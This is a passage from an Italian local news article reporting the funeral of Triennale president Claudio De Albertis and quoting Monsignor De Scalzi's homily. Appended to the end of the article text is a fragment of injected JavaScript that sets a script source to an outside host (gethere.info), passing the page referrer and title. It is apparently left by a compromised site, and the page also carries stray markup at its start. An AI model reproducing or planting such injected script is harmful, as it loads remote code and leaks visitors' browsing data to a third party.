"/>
lunedì 21 agosto 2017 08:31:52
omnimilano

De Albertis, funerali in Sant’Ambrogio. Il ricordo di monsignor De Scalzi: “Ha vissuto con la forza del mite”

5 dicembre 2016 Cronaca, Economia, Politica

È l’omelia di un amico quella fatta in ricordo di Claudio De Albertis da monsignor Erminio De Scalzi, parroco della basilica di Sant’Ambrogio, che ha celebrato il funerale del presidente della Triennale scomparso venerdì scorso. Infatti, ha tenuto a precisare, “eravamo amici, l’ho conosciuto bene, era parrocchiano, veniva alla Basilica”. In onore alla sua riservatezza, l’omelia si è soffermata sulla sua vita pubblica: “Doveroso – ha spiegato De scalzi – è il ricordo che gli deve Milano e l’intero Paese per il suo impegno lavorativo e la partecipazione attiva al dibattito costruttivo per la città. Presidente amato dei costruttori edili e della Triennale, è stato un gentiluomo rispettoso dell’ambiente, delle persone e attento ai risvolti sociali del suo operato”. Si è ricordata anche la gratitudine che “la chiesa ambrosiana gli deve per il suo impegno, non ultimo per la realizzazione del padiglione della santa sede a Expo” e la sua “passione per il fare bene che gli ha permesso di sedersi al tavolo di lavoro fino a pochi giorni prima della sua scomparsa. Aveva un dono speciale, sapeva guardare avanti, è stato una guida, un capitano vero e proprio che ci lascia insegnamenti preziosi. Rimpiangeremo lo stile con cui operava. È stato un uomo mite, che non significa essere un perdente, ma un uomo forte. Claudio ha vissuto così: con la forza del mite, rivolgendo questa forza non solo nella sua malattia, ma anche nella sua professione dove ha chiesto regole chiare che garantissero l’onestà di tutte le imprese edili contro la malattia morale dell’opacità delle imprese costruttrici”.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Condividi questo articolo